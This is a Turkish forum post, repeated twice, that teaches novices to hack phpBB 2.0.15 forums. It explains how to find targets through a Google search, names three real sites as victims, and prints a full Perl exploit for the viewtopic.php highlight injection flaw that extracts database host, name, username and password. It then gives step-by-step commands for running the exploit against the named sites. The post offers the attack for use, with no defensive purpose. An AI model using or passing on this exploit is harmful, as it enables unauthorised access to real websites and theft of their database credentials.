DeaR222
Banned
- Katılım
- 28 Haz 2006
- Mesajlar
- 235
- Reaction score
- 0
- Puanları
- 0
Arkadaslar onceLikLe kuLLanacagımız programı download edeLim
aCtivePerl
http://www.inndir.com/inndir.php?id=18025
Programı indirdikten sonra zipten cıkardıgımızda perL diye bir kLasor var bide aynı klasorun icinde toplu isLem dosyası var ona cift tıklayınca program kendi kendini pc yukLemeye basLıyor yukLediniz.
Simdi googleyi acıyoruz ve ( Powered by phpbb 2.0.15 ) Bunu aratıyoruz ve bir suru site cıkacak.
Örnegin bizim forum sitesinin en altında
Powered by ********* Version 3.5.0 Release Candidate 3 Copyright ©2000 - 2005, Jelsoft Enterprises Ltd. yazıyor isTe bizimde googlede aratıgımız sitenin en altında (Powered by phpbb 2.0.15) yazacak bunun nedenini daha sonra yaZacam
Ve kendimize bir kac kurban buLduk ben 1 2 örnek site yazayım
_www.politicaldiscussion.info/forum
_www.atwatcher.com/forums
_www.rokulabs.com/forums
Simdi sıra geLdi bu sitelere uygun exploiti buLmaya onuda size veriyoRum buyrun
Kod:
#!/usr/bin/perl
# ************************************************** ************
#**
#** phpBB 2.0.15 Viewtopic.PHP Remote Code Execution Vulnerability
#** This exploit gives the user all the details about the database
#** connection such as database host, username, password and
#** database name.
#**
#** Written by SecureD, gvr.secured<AT>gmail<DOT>com,2005
#**
#** Greetings to GvR, Jumento, PP, CKrew & friends
#**
# ************************************************** ************
use IO::Socket;
print "+-----------------------------------------------------------------------+\r\n";
print "| PhpBB 2.0.15 Database Authentication Details Exploit |\r\n";
print "| By SecureD gvr.secured<AT>gmail<DOT>com |\r\n";
print "+-----------------------------------------------------------------------+\r\n";
if (@ARGV < 3)
{
print "Usage:\r\n";
print "phpbbSecureD.pl SERVER DIR THREADID COOKIESTRING\r\n\r\n";
print "SERVER - Server where PhpBB is installed.\r\n";
print "DIR - PHPBB directory or / for no directory.\r\n";
print "THREADID - Id of an existing thread.\r\n";
print "COOKIESTRING - Optional, cookie string of the http request.\r\n";
print " Use this when a thread needs authentication for viewing\r\n";
print " You can use Firefox in combination with \"Live HTTP\r\n";
print " Headers\" to get this cookiestring.\r\n\r\n";
print "Example 1 (with cookiestring):\r\n";
print "phpbbSecured.pl 192.168.168.123 /PHPBB/ 8 \"
phpbb2mysql_data=a%3A2%3A%7Bs%3A11%3A%22
autologinid%22%3Bs%3A0%3A%22%22%3Bs%3A6%3A%22
userid%22%3Bs%3A1%3A%222%22%3B%7D;
phpbb2mysql_sid=10dae92b780914332896df43808c4e09\" \r\n\r\n";
print "Example 2 (without cookiestring):\r\n";
print "phpbbSecured.pl 192.168.168.123 /PHPBB/ 20 \r\n";
exit();
}
$serv = $ARGV[0];
$dir = $ARGV[1];
$threadid = $ARGV[2];
$cookie = $ARGV[3];
$serv =~ s/http:\/\///ge;
$delimit = "GvRSecureD";
$sploit = $dir . "viewtopic.php?t=";
$sploit .= $threadid;
$sploit .= "&highlight='.printf($delimit.";
$sploit .= "\$dbhost.";
$sploit .= "$delimit.";
$sploit .= "\$dbname.";
$sploit .= "$delimit.";
$sploit .= "\$dbuser.";
$sploit .= "$delimit.";
$sploit .= "\$dbpasswd.";
$sploit .= "$delimit).'";
$sock = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$serv", PeerPort=>"80")
or die "[+] Connecting ... Could not connect to host.\n\n";
print "[+] Connecting OK\n";
sleep(1);
print "[+] Sending exploit ";
print $sock "GET $sploit HTTP/1.1\r\n";
print $sock "Host: $serv\r\n";
if ( defined $cookie) {
print $sock "Cookie: $cookie \r\n";
}
print $sock "Connection: close\r\n\r\n";
$succes = 0;
while ($answer = <$sock>) {
$delimitIndex = index $answer, $delimit;
if ($delimitIndex >= 0) {
$succes = 1;
$urlIndex = index $answer, "href";
if ($urlIndex < 0){
$answer = substr($answer, length($delimit));
$length = 0;
while (length($answer) > 0) {
$nex = index($answer, $delimit);
if ($nex > 0) {
push(@array, substr($answer, 0, $nex));
$answer = substr($answer, $nex + length($delimit), length($answer));
} else {
$answer= "";
}
}
}
}
}
close($sock);
if ($succes == 1) {
print "OK\n";
sleep(1);
print "[+] Database Host: " . $array[0] . "\n";
sleep(1);
print "[+] Database Name: " . $array[1] . "\n";
sleep(1);
print "[+] Username: " . $array[2] . "\n";
sleep(1);
print "[+] Password: " . $array[3] . "\n";
sleep(1);
} else {
print "FAILED\n";
}
#!/usr/bin/perl
# ************************************************** ************
#**
#** phpBB 2.0.15 Viewtopic.PHP Remote Code Execution Vulnerability
#** This exploit gives the user all the details about the database
#** connection such as database host, username, password and
#** database name.
#**
#** Written by SecureD, gvr.secured<AT>gmail<DOT>com,2005
#**
#** Greetings to GvR, Jumento, PP, CKrew & friends
#**
# ************************************************** ************
use IO::Socket;
print "+-----------------------------------------------------------------------+\r\n";
print "| PhpBB 2.0.15 Database Authentication Details Exploit |\r\n";
print "| By SecureD gvr.secured<AT>gmail<DOT>com |\r\n";
print "+-----------------------------------------------------------------------+\r\n";
if (@ARGV < 3)
{
print "Usage:\r\n";
print "phpbbSecureD.pl SERVER DIR THREADID COOKIESTRING\r\n\r\n";
print "SERVER - Server where PhpBB is installed.\r\n";
print "DIR - PHPBB directory or / for no directory.\r\n";
print "THREADID - Id of an existing thread.\r\n";
print "COOKIESTRING - Optional, cookie string of the http request.\r\n";
print " Use this when a thread needs authentication for viewing\r\n";
print " You can use Firefox in combination with \"Live HTTP\r\n";
print " Headers\" to get this cookiestring.\r\n\r\n";
print "Example 1 (with cookiestring):\r\n";
print "phpbbSecured.pl 192.168.168.123 /PHPBB/ 8 \"
phpbb2mysql_data=a%3A2%3A%7Bs%3A11%3A%22
autologinid%22%3Bs%3A0%3A%22%22%3Bs%3A6%3A%22
userid%22%3Bs%3A1%3A%222%22%3B%7D;
phpbb2mysql_sid=10dae92b780914332896df43808c4e09\" \r\n\r\n";
print "Example 2 (without cookiestring):\r\n";
print "phpbbSecured.pl 192.168.168.123 /PHPBB/ 20 \r\n";
exit();
}
$serv = $ARGV[0];
$dir = $ARGV[1];
$threadid = $ARGV[2];
$cookie = $ARGV[3];
$serv =~ s/http:\/\///ge;
$delimit = "GvRSecureD";
$sploit = $dir . "viewtopic.php?t=";
$sploit .= $threadid;
$sploit .= "&highlight='.printf($delimit.";
$sploit .= "\$dbhost.";
$sploit .= "$delimit.";
$sploit .= "\$dbname.";
$sploit .= "$delimit.";
$sploit .= "\$dbuser.";
$sploit .= "$delimit.";
$sploit .= "\$dbpasswd.";
$sploit .= "$delimit).'";
$sock = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$serv", PeerPort=>"80")
or die "[+] Connecting ... Could not connect to host.\n\n";
print "[+] Connecting OK\n";
sleep(1);
print "[+] Sending exploit ";
print $sock "GET $sploit HTTP/1.1\r\n";
print $sock "Host: $serv\r\n";
if ( defined $cookie) {
print $sock "Cookie: $cookie \r\n";
}
print $sock "Connection: close\r\n\r\n";
$succes = 0;
while ($answer = <$sock>) {
$delimitIndex = index $answer, $delimit;
if ($delimitIndex >= 0) {
$succes = 1;
$urlIndex = index $answer, "href";
if ($urlIndex < 0){
$answer = substr($answer, length($delimit));
$length = 0;
while (length($answer) > 0) {
$nex = index($answer, $delimit);
if ($nex > 0) {
push(@array, substr($answer, 0, $nex));
$answer = substr($answer, $nex + length($delimit), length($answer));
} else {
$answer= "";
}
}
}
}
}
close($sock);
if ($succes == 1) {
print "OK\n";
sleep(1);
print "[+] Database Host: " . $array[0] . "\n";
sleep(1);
print "[+] Database Name: " . $array[1] . "\n";
sleep(1);
print "[+] Username: " . $array[2] . "\n";
sleep(1);
print "[+] Password: " . $array[3] . "\n";
sleep(1);
} else {
print "FAILED\n";
}
Bunu metin belegesi olarak kaydedin. Ardından dosyayı aCın adını ve uzantısını degistirecegiz metin belgesi.txt dosyasıya bunu farklı kaydet deyip php.pL diye kaydediyoruz uzanısı ---> pL <--- diye bu cok onemLi kaydettikten sonra kes veya ctrl+x deyip C: surucusunun icinde perl klasoru vaR onun icindede Bin klasoru var oraya yapıstır ctrl+v yapıyoruz
izledigimiz yoL söyLe c:\perl\bin aha buraya yaPıstırıyoruz
simdi iSimiz neredeyse bitti başLat/çalıştır cmd yazıyoruz enter diyoruz
Perl klasorumuz nerdeyse o dizine gidiyoruz mesela benim
c\:dokument setting\a burdan cıkmak icin 2 sefer cd.. enter taki kok surcuye uLasana kadar yani c\: kalana kadar ve ardından c:\ cd perl enter
bu seferde c:\perl cd bin enter dedikten sonra soyle bisey olacak c:\Perl\bin bunu kendim icin örnek verdim sizin soylede olabilir c:\perl\perl\bin
Simdi perl'i yukledigimiz klasoru bulduk sıra exploiti calıstırmaya geldi
sunu yazıyoruz c\
erl\bin>perL php.pl enter
exploitimiz calısıyor tamamdır
ardından c\erl\bin>perL php.pl www.kurbansite.com /forumyolu/ 8 enter
benim verdigim sitelerde örnek yapaLım
c\erl\bin>perl php.pl www.rokulabs.com /forums/ 8 enter diyoruz arkadaslar burda oneLi olan forum yolu mesela /forums/ olabilir /forum/ olabilir veya sallıyorum /fiendishman/ olabilir buna dikkat edecegiz cok önemli
her seyi eksiksiz yaPtıgınızı farz ediyorum uygun
c\perL\bin>perl php.pl www.kurbansite.com /forums/ 8 enter dediniz aha bizde sitenin
Data base name :
Data Base host :
User name :
Password:
eğer şu hata iLetisini verirse --->Sending exploit failed <--- ya siz bir yerde hata yapmıssınız ya o site bu acıgını kapatmıs yada bu exploit bu siteye uygun degiLdir
Arkadas Cok Basite indirgeyerek anlattım Yani bu forum sitesinin en cayLak useri biLe artık forum siTesi hackLıya biLecek
aCtivePerl
http://www.inndir.com/inndir.php?id=18025
Programı indirdikten sonra zipten cıkardıgımızda perL diye bir kLasor var bide aynı klasorun icinde toplu isLem dosyası var ona cift tıklayınca program kendi kendini pc yukLemeye basLıyor yukLediniz.
Simdi googleyi acıyoruz ve ( Powered by phpbb 2.0.15 ) Bunu aratıyoruz ve bir suru site cıkacak.
Örnegin bizim forum sitesinin en altında
Powered by ********* Version 3.5.0 Release Candidate 3 Copyright ©2000 - 2005, Jelsoft Enterprises Ltd. yazıyor isTe bizimde googlede aratıgımız sitenin en altında (Powered by phpbb 2.0.15) yazacak bunun nedenini daha sonra yaZacam
Ve kendimize bir kac kurban buLduk ben 1 2 örnek site yazayım
_www.politicaldiscussion.info/forum
_www.atwatcher.com/forums
_www.rokulabs.com/forums
Simdi sıra geLdi bu sitelere uygun exploiti buLmaya onuda size veriyoRum buyrun
Kod:
#!/usr/bin/perl
# ************************************************** ************
#**
#** phpBB 2.0.15 Viewtopic.PHP Remote Code Execution Vulnerability
#** This exploit gives the user all the details about the database
#** connection such as database host, username, password and
#** database name.
#**
#** Written by SecureD, gvr.secured<AT>gmail<DOT>com,2005
#**
#** Greetings to GvR, Jumento, PP, CKrew & friends
#**
# ************************************************** ************
use IO::Socket;
print "+-----------------------------------------------------------------------+\r\n";
print "| PhpBB 2.0.15 Database Authentication Details Exploit |\r\n";
print "| By SecureD gvr.secured<AT>gmail<DOT>com |\r\n";
print "+-----------------------------------------------------------------------+\r\n";
if (@ARGV < 3)
{
print "Usage:\r\n";
print "phpbbSecureD.pl SERVER DIR THREADID COOKIESTRING\r\n\r\n";
print "SERVER - Server where PhpBB is installed.\r\n";
print "DIR - PHPBB directory or / for no directory.\r\n";
print "THREADID - Id of an existing thread.\r\n";
print "COOKIESTRING - Optional, cookie string of the http request.\r\n";
print " Use this when a thread needs authentication for viewing\r\n";
print " You can use Firefox in combination with \"Live HTTP\r\n";
print " Headers\" to get this cookiestring.\r\n\r\n";
print "Example 1 (with cookiestring):\r\n";
print "phpbbSecured.pl 192.168.168.123 /PHPBB/ 8 \"
phpbb2mysql_data=a%3A2%3A%7Bs%3A11%3A%22
autologinid%22%3Bs%3A0%3A%22%22%3Bs%3A6%3A%22
userid%22%3Bs%3A1%3A%222%22%3B%7D;
phpbb2mysql_sid=10dae92b780914332896df43808c4e09\" \r\n\r\n";
print "Example 2 (without cookiestring):\r\n";
print "phpbbSecured.pl 192.168.168.123 /PHPBB/ 20 \r\n";
exit();
}
$serv = $ARGV[0];
$dir = $ARGV[1];
$threadid = $ARGV[2];
$cookie = $ARGV[3];
$serv =~ s/http:\/\///ge;
$delimit = "GvRSecureD";
$sploit = $dir . "viewtopic.php?t=";
$sploit .= $threadid;
$sploit .= "&highlight='.printf($delimit.";
$sploit .= "\$dbhost.";
$sploit .= "$delimit.";
$sploit .= "\$dbname.";
$sploit .= "$delimit.";
$sploit .= "\$dbuser.";
$sploit .= "$delimit.";
$sploit .= "\$dbpasswd.";
$sploit .= "$delimit).'";
$sock = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$serv", PeerPort=>"80")
or die "[+] Connecting ... Could not connect to host.\n\n";
print "[+] Connecting OK\n";
sleep(1);
print "[+] Sending exploit ";
print $sock "GET $sploit HTTP/1.1\r\n";
print $sock "Host: $serv\r\n";
if ( defined $cookie) {
print $sock "Cookie: $cookie \r\n";
}
print $sock "Connection: close\r\n\r\n";
$succes = 0;
while ($answer = <$sock>) {
$delimitIndex = index $answer, $delimit;
if ($delimitIndex >= 0) {
$succes = 1;
$urlIndex = index $answer, "href";
if ($urlIndex < 0){
$answer = substr($answer, length($delimit));
$length = 0;
while (length($answer) > 0) {
$nex = index($answer, $delimit);
if ($nex > 0) {
push(@array, substr($answer, 0, $nex));
$answer = substr($answer, $nex + length($delimit), length($answer));
} else {
$answer= "";
}
}
}
}
}
close($sock);
if ($succes == 1) {
print "OK\n";
sleep(1);
print "[+] Database Host: " . $array[0] . "\n";
sleep(1);
print "[+] Database Name: " . $array[1] . "\n";
sleep(1);
print "[+] Username: " . $array[2] . "\n";
sleep(1);
print "[+] Password: " . $array[3] . "\n";
sleep(1);
} else {
print "FAILED\n";
}
#!/usr/bin/perl
# ************************************************** ************
#**
#** phpBB 2.0.15 Viewtopic.PHP Remote Code Execution Vulnerability
#** This exploit gives the user all the details about the database
#** connection such as database host, username, password and
#** database name.
#**
#** Written by SecureD, gvr.secured<AT>gmail<DOT>com,2005
#**
#** Greetings to GvR, Jumento, PP, CKrew & friends
#**
# ************************************************** ************
use IO::Socket;
print "+-----------------------------------------------------------------------+\r\n";
print "| PhpBB 2.0.15 Database Authentication Details Exploit |\r\n";
print "| By SecureD gvr.secured<AT>gmail<DOT>com |\r\n";
print "+-----------------------------------------------------------------------+\r\n";
if (@ARGV < 3)
{
print "Usage:\r\n";
print "phpbbSecureD.pl SERVER DIR THREADID COOKIESTRING\r\n\r\n";
print "SERVER - Server where PhpBB is installed.\r\n";
print "DIR - PHPBB directory or / for no directory.\r\n";
print "THREADID - Id of an existing thread.\r\n";
print "COOKIESTRING - Optional, cookie string of the http request.\r\n";
print " Use this when a thread needs authentication for viewing\r\n";
print " You can use Firefox in combination with \"Live HTTP\r\n";
print " Headers\" to get this cookiestring.\r\n\r\n";
print "Example 1 (with cookiestring):\r\n";
print "phpbbSecured.pl 192.168.168.123 /PHPBB/ 8 \"
phpbb2mysql_data=a%3A2%3A%7Bs%3A11%3A%22
autologinid%22%3Bs%3A0%3A%22%22%3Bs%3A6%3A%22
userid%22%3Bs%3A1%3A%222%22%3B%7D;
phpbb2mysql_sid=10dae92b780914332896df43808c4e09\" \r\n\r\n";
print "Example 2 (without cookiestring):\r\n";
print "phpbbSecured.pl 192.168.168.123 /PHPBB/ 20 \r\n";
exit();
}
$serv = $ARGV[0];
$dir = $ARGV[1];
$threadid = $ARGV[2];
$cookie = $ARGV[3];
$serv =~ s/http:\/\///ge;
$delimit = "GvRSecureD";
$sploit = $dir . "viewtopic.php?t=";
$sploit .= $threadid;
$sploit .= "&highlight='.printf($delimit.";
$sploit .= "\$dbhost.";
$sploit .= "$delimit.";
$sploit .= "\$dbname.";
$sploit .= "$delimit.";
$sploit .= "\$dbuser.";
$sploit .= "$delimit.";
$sploit .= "\$dbpasswd.";
$sploit .= "$delimit).'";
$sock = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$serv", PeerPort=>"80")
or die "[+] Connecting ... Could not connect to host.\n\n";
print "[+] Connecting OK\n";
sleep(1);
print "[+] Sending exploit ";
print $sock "GET $sploit HTTP/1.1\r\n";
print $sock "Host: $serv\r\n";
if ( defined $cookie) {
print $sock "Cookie: $cookie \r\n";
}
print $sock "Connection: close\r\n\r\n";
$succes = 0;
while ($answer = <$sock>) {
$delimitIndex = index $answer, $delimit;
if ($delimitIndex >= 0) {
$succes = 1;
$urlIndex = index $answer, "href";
if ($urlIndex < 0){
$answer = substr($answer, length($delimit));
$length = 0;
while (length($answer) > 0) {
$nex = index($answer, $delimit);
if ($nex > 0) {
push(@array, substr($answer, 0, $nex));
$answer = substr($answer, $nex + length($delimit), length($answer));
} else {
$answer= "";
}
}
}
}
}
close($sock);
if ($succes == 1) {
print "OK\n";
sleep(1);
print "[+] Database Host: " . $array[0] . "\n";
sleep(1);
print "[+] Database Name: " . $array[1] . "\n";
sleep(1);
print "[+] Username: " . $array[2] . "\n";
sleep(1);
print "[+] Password: " . $array[3] . "\n";
sleep(1);
} else {
print "FAILED\n";
}
Bunu metin belegesi olarak kaydedin. Ardından dosyayı aCın adını ve uzantısını degistirecegiz metin belgesi.txt dosyasıya bunu farklı kaydet deyip php.pL diye kaydediyoruz uzanısı ---> pL <--- diye bu cok onemLi kaydettikten sonra kes veya ctrl+x deyip C: surucusunun icinde perl klasoru vaR onun icindede Bin klasoru var oraya yapıstır ctrl+v yapıyoruz
izledigimiz yoL söyLe c:\perl\bin aha buraya yaPıstırıyoruz
simdi iSimiz neredeyse bitti başLat/çalıştır cmd yazıyoruz enter diyoruz
Perl klasorumuz nerdeyse o dizine gidiyoruz mesela benim
c\:dokument setting\a burdan cıkmak icin 2 sefer cd.. enter taki kok surcuye uLasana kadar yani c\: kalana kadar ve ardından c:\ cd perl enter
bu seferde c:\perl cd bin enter dedikten sonra soyle bisey olacak c:\Perl\bin bunu kendim icin örnek verdim sizin soylede olabilir c:\perl\perl\bin
Simdi perl'i yukledigimiz klasoru bulduk sıra exploiti calıstırmaya geldi
sunu yazıyoruz c\
erl\bin>perL php.pl enterexploitimiz calısıyor tamamdır
ardından c\
erl\bin>perL php.pl www.kurbansite.com /forumyolu/ 8 enterbenim verdigim sitelerde örnek yapaLım
c\
erl\bin>perl php.pl www.rokulabs.com /forums/ 8 enter diyoruz arkadaslar burda oneLi olan forum yolu mesela /forums/ olabilir /forum/ olabilir veya sallıyorum /fiendishman/ olabilir buna dikkat edecegiz cok önemli her seyi eksiksiz yaPtıgınızı farz ediyorum uygun
c\perL\bin>perl php.pl www.kurbansite.com /forums/ 8 enter dediniz aha bizde sitenin
Data base name :
Data Base host :
User name :
Password:
eğer şu hata iLetisini verirse --->Sending exploit failed <--- ya siz bir yerde hata yapmıssınız ya o site bu acıgını kapatmıs yada bu exploit bu siteye uygun degiLdir
Arkadas Cok Basite indirgeyerek anlattım Yani bu forum sitesinin en cayLak useri biLe artık forum siTesi hackLıya biLecek
